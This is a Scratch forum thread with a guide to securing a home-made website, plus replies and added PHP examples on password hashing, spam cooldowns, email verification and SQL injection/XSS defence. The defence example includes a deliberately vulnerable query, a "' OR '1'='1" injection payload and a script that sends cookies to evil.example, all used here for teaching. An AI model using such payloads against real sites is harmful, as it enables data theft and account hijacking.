The small steps on how to secure your online site or community
A guide by LS97
Once you get into computers and programming, sometimes just visiting sites isn’t enough. Making your own site becomes a fun and useful alternative. This often turns out to be very productive, educational and satisfying. However, there are some really useful key points that you want to keep in mind while creating your online community.
Passwords, passwords, passwords…
First of all, you need a good password. This keeps on coming up everywhere, from school email accounts to game registrations, and it’s a must. It is extremely important to get a strong password and keep it safe. Nobody needs to know it, and it has to be hard to guess but easy to remember.
Choosing the tools
Second, think about the purpose of your site. What will people use it for? Who will use it? How? If the site is meant to promote a product and give more information about it, it’s better to use an online site maker such as Weebly. In general, these popular online site makers are better to use for this kind of site because they are more secure. Try to avoid site makers with advertisements because they can contain viruses or inappropriate content that you can’t control.
If you want to make an online community with user-moderated forums, uploads, or chats, the story gets a bit more complicated. You need to start from a blank file in notepad, and there are a lot of security precautions to take.
Before you even start, you have to know the basics of whatever programming language you’ll use (commonly PHP). Trust me, it helps.
I’ve got the power!
As much as your own passwords are important, so are the passwords and information of other users. Make sure that all of the users' information is stored safely on the server and is encrypted. Also store the users' IP addresses in a database so that you can ban them if they do anything wrong.
Moderation is another important aspect of online communities. Any user-submitted content (forums, chats, messages, comments, blogs) must have a word filter/censor in place! Also, check the content regularly to make sure no bad pictures are posted. Private chats are dodgy because they can’t be moderated, so avoid them.
You might get excited about being able to control other users: don't abuse your power. It's never a good idea to allow many people to moderate your site. You will manage just fine with yourself alone as a moderator. If your site gets very popular you can maybe add a second power-person. I wouldn't have more than that because things will get difficult to manage.
Spam time!
Spam has become so popular that even the most secure sites nowadays are occasional victims of this senseless practice. On your forums, try to implement a system similar to the one on the Scratch website. When a user registers, give them partial abilities until you know you can trust them.
As much as the 60-second rule is annoying, it helps so much in reducing spam I can't even describe it. Being a nice guy and removing the rule from your site will probably earn you hours of spam removal.
The time rule doesn't only have to apply to forums. Uploads can be a big problem to remove if you don't have good tools, so prevention is the key. Add a 5-minute delay between uploads and you'll be fine.
Just in case spam does happen, and it's inappropriate, think of an easy method to quickly remove it or hide it from view until you have taken care of it completely. You don't want a bunch of people seeing stuff they don't want to see.
Verification of Scratchers – Not everyone is who they say they are…
On the internet it’s really easy to pretend you’re someone other than who you really are. Some bad people might pretend to be a known Scratcher and apply for admin on your site under that fake username. To avoid this happening, first ask the user to post a comment on your Scratch projects with that account name. If they don’t, there’s a good chance they’re some kind of bad guy.
The Happy Ending
Once you think you're following these rules and feel good about your site's security, you can go ahead and publish it. Run it by the Scratch Team to see if it's acceptable to advertise on the Scratch Forums. If you're lucky, you'll see your site grow from a bunch of code to a wonderful community.
Have fun making your own site!
Last edited by scimonster (2012-05-21 14:01:52)
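As an added example that is not part of LS97's guide: the "Passwords" and "I've got the power!" sections say user information must be stored safely. For passwords the standard practice is not reversible encryption but a salted, slow hash, so the block below registers users with password_hash() and checks logins with password_verify(); the plaintext is never written anywhere. The same block implements the 60-second posting rule from "Spam time!" as a per-user cooldown. It uses an in-memory SQLite database through PDO purely so that it runs stand-alone; the table, column and function names are this example's own, not the guide's.

```php
<?php
// Added example (not from the original guide). Assumes PHP >= 7.0 with the
// pdo_sqlite extension; the schema and function names are this example's own.
declare(strict_types=1);

// The "60 second rule" from the guide, as a constant so it is easy to tune.
const POST_COOLDOWN_SECONDS = 60;

function openDatabase(): PDO
{
    // In-memory SQLite so the example runs stand-alone; a real site would
    // connect to its MySQL/MariaDB server here instead.
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE users (
        id            INTEGER PRIMARY KEY AUTOINCREMENT,
        username      TEXT UNIQUE NOT NULL,
        password_hash TEXT NOT NULL,
        last_post_at  INTEGER NOT NULL DEFAULT 0
    )');
    return $db;
}

function registerUser(PDO $db, string $username, string $password): void
{
    // password_hash() picks a random salt and a deliberately slow algorithm
    // (bcrypt by default). Only the resulting hash string is stored.
    $hash = password_hash($password, PASSWORD_DEFAULT);
    $stmt = $db->prepare('INSERT INTO users (username, password_hash) VALUES (:u, :h)');
    $stmt->execute([':u' => $username, ':h' => $hash]);
}

function checkLogin(PDO $db, string $username, string $password): bool
{
    $stmt = $db->prepare('SELECT password_hash FROM users WHERE username = :u');
    $stmt->execute([':u' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return false; // unknown user
    }
    // password_verify() re-derives the hash with the stored salt and compares.
    return password_verify($password, $row['password_hash']);
}

// Allow a post only if at least POST_COOLDOWN_SECONDS have passed since the
// user's previous post. A user who has never posted has last_post_at = 0.
function canPostNow(PDO $db, string $username, int $now): bool
{
    $stmt = $db->prepare('SELECT last_post_at FROM users WHERE username = :u');
    $stmt->execute([':u' => $username]);
    $last = $stmt->fetchColumn();
    if ($last === false) {
        return false; // unknown user may not post at all
    }
    return ($now - (int)$last) >= POST_COOLDOWN_SECONDS;
}

function recordPost(PDO $db, string $username, int $now): void
{
    $stmt = $db->prepare('UPDATE users SET last_post_at = :t WHERE username = :u');
    $stmt->execute([':t' => $now, ':u' => $username]);
}

// Demonstration on constructed data.
$db = openDatabase();
registerUser($db, 'alice', 'correct horse battery staple');

echo 'login with the right password: ' . (checkLogin($db, 'alice', 'correct horse battery staple') ? "accepted\n" : "rejected\n");
echo 'login with a wrong password:   ' . (checkLogin($db, 'alice', 'wrong password') ? "accepted\n" : "rejected\n");

$t = time();
echo 'first post ever:               ' . (canPostNow($db, 'alice', $t) ? "allowed\n" : "blocked\n");
recordPost($db, 'alice', $t);
echo 'second post 30 s later:        ' . (canPostNow($db, 'alice', $t + 30) ? "allowed\n" : "blocked\n");
echo 'second post 60 s later:        ' . (canPostNow($db, 'alice', $t + 60) ? "allowed\n" : "blocked\n");
```

Two things worth noting for a real deployment: the cooldown check and the update should happen in the same request so that two quick submissions cannot both pass the check before either is recorded, and the cooldown is keyed by account here, which is why the guide's advice to keep new accounts on partial abilities matters for spammers who register many of them.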
Very good!
Some good advice there, LS97! Unlike so many website guides, this focuses less on the code and more about how to run the site, something plenty of Scratchers here with their own sites should read and take on board!
Useful, and informative. Indeed good advice.
Great information. Apparently P2S like it too. Check the announcement about user-created sites!
Nice advice! I read through it, and it's pretty good. Here are some ideas I came up with:
When a user submits a comment, it will go through moderation before the comment can be posted. This will definitely prevent spam.
Download a program that is constantly checking the website for spam. Have some antivirus just in case.
Be nice.
That's all I could think of.
Putting posts through moderation before allowing users to see the post is certainly a way to stop spam, but it can seriously frustrate users if they have to wait 24 hrs or so for their post to appear. It can also cause a lot of grief for mods if there are a lot of posts. In my opinion, it is better to supply a report button on each post and allow each post to appear UNTIL it is flagged. Not quite as safe as your suggestion but much more implementable. Have your mods skim through the site keeping an eye out and there should be no problems. What I have for the in-progress block library site is a moderator page that lists all posts that have not yet been confirmed as spam or not spam and allows them to see and categorise each post properly from one page.
Useful info! Thanks!
Ask yourself before creating the website: why are you creating it, and what purpose will it serve? Keeping those two things in mind will help you with how to deal with different situations. Great guide!
GREAT guide!
Thanks for the time you took to write this up LS97!
Something should probably be said on here about SQL Injection and XSS prevention as well
SJRCS_011 wrote:
Something should probably be said on here about SQL Injection and XSS prevention as well
Essentially, remember to escape all user input (don't trust any of it) with mysql_real_escape_string($string); (in PHP at least) and for preventing XSS remember to escape all HTML characters (htmlspecialchars($string)) and other precautions.
XSS (Cross Site Scripting) Prevention Cheat Sheet
SQL Injection Prevention Cheat Sheet
Last edited by rookwood101 (2012-05-20 04:56:29)
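As an added example that is not part of rookwood101's reply or the guide: the reply names mysql_real_escape_string() and htmlspecialchars(). The block below first shows the injection the reply is warning about, then the two defences as a practitioner would write them today: a prepared statement with bound parameters, which keeps data out of the SQL text entirely (the mysql_* functions the reply mentions were removed in PHP 7), and htmlspecialchars() with ENT_QUOTES and an explicit charset for anything echoed into a page. It uses an in-memory SQLite database through PDO so it runs stand-alone; the table, the sample rows and the function names are this example's own.

```php
<?php
// Added example (not from the original thread). Assumes PHP >= 7.0 with the
// pdo_sqlite extension; the schema and helper names are this example's own.
declare(strict_types=1);

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE posts (id INTEGER PRIMARY KEY, author TEXT, body TEXT)');
// Constructed sample rows; bob's draft is the one an attacker should not see.
$db->exec("INSERT INTO posts (author, body) VALUES ('alice', 'hello'), ('bob', 'secret draft')");

// VULNERABLE: the untrusted string is pasted straight into the SQL text, so
// a quote inside it ends the literal and the rest becomes SQL.
function postsByAuthorVulnerable(PDO $db, string $author): array
{
    $sql = "SELECT author, body FROM posts WHERE author = '$author'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// HARDENED: the value travels as a bound parameter, never as SQL text, so
// nothing the user types can change the structure of the query.
function postsByAuthorSafe(PDO $db, string $author): array
{
    $stmt = $db->prepare('SELECT author, body FROM posts WHERE author = :author');
    $stmt->execute([':author' => $author]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// The classic tautology: closes the quoted string and ORs in a condition
// that is true for every row.
$payload = "alice' OR '1'='1";

$leaked = postsByAuthorVulnerable($db, $payload);
echo 'vulnerable query returned ' . count($leaked) . " row(s)\n";
foreach ($leaked as $row) {
    echo '  ' . $row['author'] . ': ' . $row['body'] . "\n";
}

$safe = postsByAuthorSafe($db, $payload);
echo 'prepared statement returned ' . count($safe) . " row(s) for the same input\n";

// XSS: escape at output time, for the HTML context the value lands in.
function renderPost(array $post): string
{
    // ENT_QUOTES also escapes single quotes, so the value is safe inside
    // either kind of attribute quote; the charset must match the page's.
    $author = htmlspecialchars($post['author'], ENT_QUOTES | ENT_HTML5, 'UTF-8');
    $body   = htmlspecialchars($post['body'],   ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<div class="post"><b>' . $author . '</b>: ' . $body . '</div>';
}

// Constructed malicious comment: a script that ships the visitor's cookie away.
$xssBody = '<script>document.location="http://evil.example/?c="+document.cookie</script>';
// htmlspecialchars() turns < > " ' & into entities, so the browser shows the
// tag as text instead of running it.
echo renderPost(['author' => 'mallory', 'body' => $xssBody]) . "\n";
```

Escaping with htmlspecialchars() is the right tool only for text placed into HTML element content or quoted attributes; a value dropped into a JavaScript block, a URL or a CSS rule needs the escaping rules of that context, which is the point of the XSS cheat sheet linked above.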
SJRCS_011 wrote:
Something should probably be said on here about SQL Injection and XSS prevention as well
This guide is more focused around the principles behind it, rather than the specific code or workaround prevention. I assumed that if you know how to code, you know how easy it is to inject scripts onto badly-protected pages.
Enjoy the new status of ITopic.
scimonster wrote:
Enjoy the new status of ITopic.
Gee, thank you
LS97 wrote:
SJRCS_011 wrote:
Something should probably be said on here about SQL Injection and XSS prevention as well
This guide is more focused around the principles behind it, rather than the specific code or workaround prevention. I assumed that if you know how to code, you know how easy it is to inject scripts onto badly-protected pages.
Precisely why you should mention something about it. Now that almost everyone on Scratch has some sort of a website (forums are relatively safe, but still), and that they are required to view this, they should know what they're up against.
As you said, any programmer with two brain cells to rub together could eventually figure out how to get through an unprotected site.
I still haven't even put anti-spam protection on my site. I will eventually.
You could also tell them to use CAPTCHA or send an automated email to them, to see if they are a computer or a human.
And, for security, if their host allows them to, tell them to use SSL and HTTPS wherever possible.
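The automated-email check suggested above, as an added example that is not part of that post: the server generates an unguessable token with random_bytes(), stores only a SHA-256 of it together with an expiry, puts the raw token in the link it would email, and on the click compares hashes in constant time with hash_equals() before marking the account verified. The in-memory SQLite table and the function names are this example's own; the mail-sending step is represented by returning the link instead of calling mail(), and the host name in the link is hypothetical, so the block runs offline.

```php
<?php
// Added example (not from the original thread). Assumes PHP >= 7.0 with the
// pdo_sqlite extension; the schema and helper names are this example's own.
declare(strict_types=1);

const TOKEN_LIFETIME_SECONDS = 24 * 3600;

function openDatabase(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE email_tokens (
        username   TEXT PRIMARY KEY,
        token_hash TEXT NOT NULL,
        expires_at INTEGER NOT NULL,
        verified   INTEGER NOT NULL DEFAULT 0
    )');
    return $db;
}

// Create a token for the user and return the link that would be emailed.
// Only the hash of the token is stored, so a leaked database does not hand
// an attacker working verification links.
function issueVerificationLink(PDO $db, string $username, int $now): string
{
    $token = bin2hex(random_bytes(32)); // 256 bits from the OS CSPRNG
    $stmt = $db->prepare('INSERT OR REPLACE INTO email_tokens
        (username, token_hash, expires_at, verified) VALUES (:u, :h, :e, 0)');
    $stmt->execute([
        ':u' => $username,
        ':h' => hash('sha256', $token),
        ':e' => $now + TOKEN_LIFETIME_SECONDS,
    ]);
    // A real site would hand this string to mail(); the host is hypothetical.
    return 'https://example.invalid/verify?user=' . rawurlencode($username)
        . '&token=' . $token;
}

// Called when the user follows the link. Returns true only for a fresh,
// unused, matching token, and marks the account verified on success.
function verifyToken(PDO $db, string $username, string $token, int $now): bool
{
    $stmt = $db->prepare('SELECT token_hash, expires_at, verified
        FROM email_tokens WHERE username = :u');
    $stmt->execute([':u' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || (int)$row['verified'] === 1 || $now > (int)$row['expires_at']) {
        return false;
    }
    // hash_equals() compares in constant time, so response timing does not
    // leak how many leading bytes of a guessed token were right.
    if (!hash_equals($row['token_hash'], hash('sha256', $token))) {
        return false;
    }
    $db->prepare('UPDATE email_tokens SET verified = 1 WHERE username = :u')
       ->execute([':u' => $username]);
    return true;
}

function report(string $attempt, bool $ok): void
{
    echo $attempt . ': ' . ($ok ? 'accepted' : 'rejected') . "\n";
}

// Demonstration on constructed data: pull the token back out of the link
// exactly as a browser would send it.
$db   = openDatabase();
$now  = time();
$link = issueVerificationLink($db, 'alice', $now);
parse_str((string)parse_url($link, PHP_URL_QUERY), $query);

report('guessed token',            verifyToken($db, 'alice', 'not-the-token', $now));
report('real token after expiry',  verifyToken($db, 'alice', $query['token'], $now + 2 * TOKEN_LIFETIME_SECONDS));
report('real token in time',       verifyToken($db, 'alice', $query['token'], $now));
report('real token used twice',    verifyToken($db, 'alice', $query['token'], $now));
```

The link itself should only ever be served over HTTPS, as the post above says, since the raw token is in the URL; that also keeps it out of the hands of anyone watching the network between the user and the site.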
Great guide. When is the next version of Bingo coming out?
Richard2000 wrote:
Great guide. When is the next version of Bingo coming out?
Thanks!
I have to admit this might be slightly off-topic, so next time maybe post a comment on one of my projects so as not to disturb the forums, but:
I'm working hard on Bingo 2.0 mainly on adding more complete features and fixing many bugs, instead of adding new blocks (albeit still having added a dozen). However my aim is to provide more functionality with the blocks that I currently have by adding intuitive features and more possibilities of adding different arguments.
Two major changes in 2.0, one in the field of programming and one feature, are data types and a brand new mod share browser inside the program.
I do not have an estimated release date, but I don't expect it to be finished before September as I'm going on holiday soon.
Bumpity bump! Bump!